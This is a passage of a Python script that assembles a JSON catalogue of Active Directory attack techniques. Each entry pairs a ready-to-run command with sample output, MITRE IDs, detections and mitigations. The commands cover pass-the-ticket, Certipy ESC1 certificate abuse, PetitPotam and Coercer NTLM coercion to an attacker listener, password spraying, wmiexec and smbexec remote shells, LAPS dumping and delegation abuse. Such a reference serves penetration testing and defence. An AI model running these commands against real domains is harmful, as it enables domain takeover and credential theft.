"[*] Ticket successfully imported\n[*] Now accessing resources as admin@corp.local",
"Use stolen Kerberos tickets for lateral movement — works even when NTLM is disabled.",
["Valid Kerberos ticket (from dump or forge)"],["T1550.003"],"Lateral Movement",
["Ticket used from unusual source","Ticket reuse"],
["Short ticket lifetimes","Monitor ticket usage patterns"],
["Ticket expired"],["mimikatz kerberos::ptt"],
["https://github.com/GhostPack/Rubeus"],
["pass-the-ticket","kerberos","lateral","rubeus","ptt"]),
e("certifried-adcs","certipy","active_directory",4,L,
"certipy find -u jsmith@corp.local -p 'Password1!' -dc-ip <dc_ip> -vulnerable",
"Certipy AD CS Enumeration","Finds vulnerable Active Directory Certificate Services templates for privilege escalation.",
{"-vulnerable":"Show only vulnerable templates"},
"[*] Found vulnerable template: ESC1\n  Template: UserAuth\n  Enrollee: Domain Users\n  Can specify SAN: True\n  → Any domain user can request cert as Domain Admin!",
"Find AD CS misconfigurations — often provides direct path to Domain Admin.",
["Domain user credentials","AD CS deployed"],["T1649"],"Privilege Escalation",
["Certificate enrollment requests"],["Fix template permissions","Require manager approval"],
["No AD CS deployed"],["Certify.exe (Windows)"],
["https://github.com/ly4k/Certipy"],
["adcs","certipy","certificate","esc1","privilege-escalation"]),
e("certipy-exploit-esc1","certipy","active_directory",4,L,
"certipy req -u jsmith@corp.local -p 'Password1!' -ca CORP-CA -template UserAuth -upn admin@corp.local\ncertipy auth -pfx admin.pfx",
"Certipy ESC1 Exploit","Exploits ESC1 misconfiguration to get certificate as Domain Admin.",
{"-ca":"Certificate Authority","-template":"Vulnerable template","-upn":"Target user UPN"},
"[*] Got certificate for admin@corp.local\n[*] Using certificate to authenticate...\n[*] Got TGT for admin@corp.local\n[*] Got NTLM hash: fc525c96...",
"Escalate from domain user to Domain Admin via AD CS ESC1.",
["Vulnerable ESC1 template","Domain user"],["T1649"],"Privilege Escalation",
["Certificate request with different UPN"],["Fix template permissions"],
["Template not vulnerable"],["Certify.exe + Rubeus"],
["https://github.com/ly4k/Certipy"],
["adcs","esc1","exploit","domain-admin","certificate"]),
e("petitpotam-coerce","petitpotam","active_directory",4,L,
"python3 PetitPotam.py <attacker_ip> <dc_ip>",
"PetitPotam (NTLM Coercion)","Coerces DC to authenticate to attacker — combine with NTLM relay for instant DA.",
{},"[*] Triggering EfsRpcOpenFileRaw on DC...\n[+] DC authenticated to our server!\n[+] Relay to AD CS → Domain Admin certificate obtained",
"Force DC authentication for relay attacks — one of the most powerful AD attacks.",
["Network access to DC","Relay target (AD CS or other)"],["T1187"],"Credential Access",
["EFS RPC calls to external hosts","NTLM auth from DC to non-DC"],
["Disable NTLM on DCs","Enable EPA","Patch EFS"],
["EFS patched","NTLM disabled on DC"],["Coercer","DFSCoerce","PrinterBug"],
["https://github.com/topotam/PetitPotam"],
["petitpotam","coercion","ntlm","relay","domain-admin"]),
e("coercer-all","coercer","active_directory",4,L,
"coercer coerce -u jsmith -p 'Password1!' -d corp.local -t <dc_ip> -l <attacker_ip>",
"Coercer (All Coercion Methods)","Tests all known NTLM coercion methods — PetitPotam, PrinterBug, DFSCoerce, etc.",
{"-t":"Target to coerce","-l":"Listener (attacker)"},
"[+] MS-EFSR (PetitPotam): VULNERABLE\n[+] MS-RPRN (PrinterBug): VULNERABLE\n[-] MS-DFSNM: Not vulnerable",
"Test all coercion vectors at once — find which methods work for relay attacks.",
["Domain credentials","Network access"],["T1187"],"Credential Access",
["RPC calls triggering outbound auth"],["Patch all coercion vectors","Disable NTLM"],
["All methods patched"],["PetitPotam","SpoolSample","DFSCoerce"],
["https://github.com/p0dalirius/Coercer"],
["coercer","coercion","all-methods","ntlm","relay"]),
e("crackmapexec-spray","netexec","active_directory",4,L,
"netexec smb <dc_ip> -u users.txt -p 'Summer2024!' --continue-on-success",
"NetExec Password Spray (SMB)","Sprays password against domain users via SMB — shows which accounts are valid.",
{"--continue-on-success":"Don't stop at first hit"},
"SMB  10.0.0.1  445  DC01  [+] corp.local\\jsmith:Summer2024!\nSMB  10.0.0.1  445  DC01  [+] corp.local\\helpdesk:Summer2024!",
"Domain password spray via SMB — identifies accounts with weak passwords.",
["User list","SMB accessible"],["T1110.003"],"Credential Access",
["Multiple failed logins (Event 4625)","Spray pattern"],
["Account lockout","Ban common passwords","MFA"],
["Account lockout triggered"],["kerbrute (no lockout risk)","sprayhound"],
["https://github.com/Pennyw0rth/NetExec"],
["spray","smb","netexec","domain","password"]),
e("impacket-wmiexec","impacket","active_directory",4,L,
"wmiexec.py corp.local/admin:'Password1!'@<target>",
"WMIExec (Stealthy Lateral Movement)","Executes commands via WMI — doesn't create a service (stealthier than PsExec).",
{},"[*] SMBv3.0 dialect used\nC:\\>whoami\ncorp\\admin",
"Stealthier lateral movement — uses WMI instead of creating services.",
["Valid credentials","WMI accessible"],["T1047"],"Lateral Movement",
["WMI activity (Event 4688 with wmiprvse parent)"],
["Restrict WMI access","Monitor WMI usage"],
["WMI blocked by firewall"],["psexec","smbexec","atexec"],
["https://github.com/fortra/impacket"],
["wmiexec","wmi","stealth","lateral","impacket"]),
e("impacket-smbexec","impacket","active_directory",4,L,
"smbexec.py corp.local/admin:'Password1!'@<target>",
"SMBExec (Semi-Interactive Shell)","Creates a service that echoes commands to a file — semi-interactive shell via SMB.",
{},"[!] Launching semi-interactive shell\nC:\\Windows\\system32>whoami\ncorp\\admin",
"Alternative to PsExec — different detection signature.",
["Valid credentials","SMB accessible","Local admin"],["T1021.002"],"Lateral Movement",
["Service creation","File writes to ADMIN$"],
["Monitor service creation","Restrict ADMIN$ access"],
["SMB signing required without valid creds"],["wmiexec","psexec","atexec"],
["https://github.com/fortra/impacket"],
["smbexec","lateral","smb","service","impacket"]),
e("laps-dump","netexec","active_directory",4,L,
"netexec ldap <dc_ip> -u jsmith -p 'Password1!' -M laps",
"LAPS Password Dump","Reads Local Administrator Password Solution (LAPS) passwords from AD — instant local admin.",
{"-M laps":"LAPS module"},
"LAPS  10.0.0.1  DC01  [+] PC01: Administrator:Xk9#mP2$vL7!",
"Read LAPS passwords if you have the right AD permissions — instant local admin on workstations.",
["LAPS read permissions","Domain credentials"],["T1003"],"Credential Access",
["LAPS attribute read (Event 4662)"],["Restrict LAPS read permissions","Audit LAPS access"],
["No LAPS read permissions"],["Get-LAPSPasswords.ps1","ldapsearch"],
["https://github.com/Pennyw0rth/NetExec"],
["laps","local-admin","password","active-directory","netexec"]),
e("constrained-delegation","rubeus","active_directory",4,W,
"Rubeus.exe s4u /user:svc_web /rc4:<hash> /impersonateuser:admin /msdsspn:cifs/fileserver.corp.local /ptt",
"Constrained Delegation Abuse","Abuses constrained delegation to impersonate any user to allowed services.",
{"/user":"Delegated account","/impersonateuser":"User to impersonate","/msdsspn":"Target SPN"},
"[*] S4U2Self: Got TGS for admin to svc_web\n[*] S4U2Proxy: Got TGS for admin to cifs/fileserver\n[*] Ticket imported",
"Impersonate Domain Admin to specific services via constrained delegation.",
["Account with constrained delegation","Account hash"],["T1134"],"Privilege Escalation",
["S4U2Self/S4U2Proxy requests (Event 4769)"],["Minimize delegation","Use RBCD instead"],
["No delegated accounts found"],["getST.py (impacket)"],
["https://github.com/GhostPack/Rubeus"],
["delegation","constrained","s4u","impersonate","kerberos"]),
e("resource-based-delegation","impacket","active_directory",4,L,
"# Add RBCD:\nrbcd.py -delegate-from YOURPC$ -delegate-to TARGET$ -dc-ip <dc_ip> -action write corp.local/jsmith:'Password1!'\n# Get ticket:\ngetST.py -spn cifs/TARGET.corp.local -impersonate admin corp.local/YOURPC$ -hashes :hash",
"Resource-Based Constrained Delegation (RBCD)","Abuses write permissions on computer objects to configure delegation and impersonate users.",
{},"[*] Delegation rights modified\n[*] Getting TGT for YOURPC$\n[*] Impersonating admin\n[*] Got TGS for admin to cifs/TARGET",
"If you can write to a computer's msDS-AllowedToActOnBehalfOfOtherIdentity, you can impersonate any user.",
["Write permission on target computer object","Computer account or hash"],["T1134"],"Privilege Escalation",
["msDS-AllowedToActOnBehalfOfOtherIdentity modification","S4U requests"],
["Restrict computer object write permissions","Monitor delegation changes"],
["No write permissions on computer objects"],["Rubeus s4u"],
["https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-target-exploitation"],
["rbcd","resource-based","delegation","computer","write"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 10 — final push to 400+...")
    save("bulk10_privesc.json",PRIVESC10)
    save("bulk10_enum.json",ENUM10)
    save("bulk10_ad.json",AD10)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
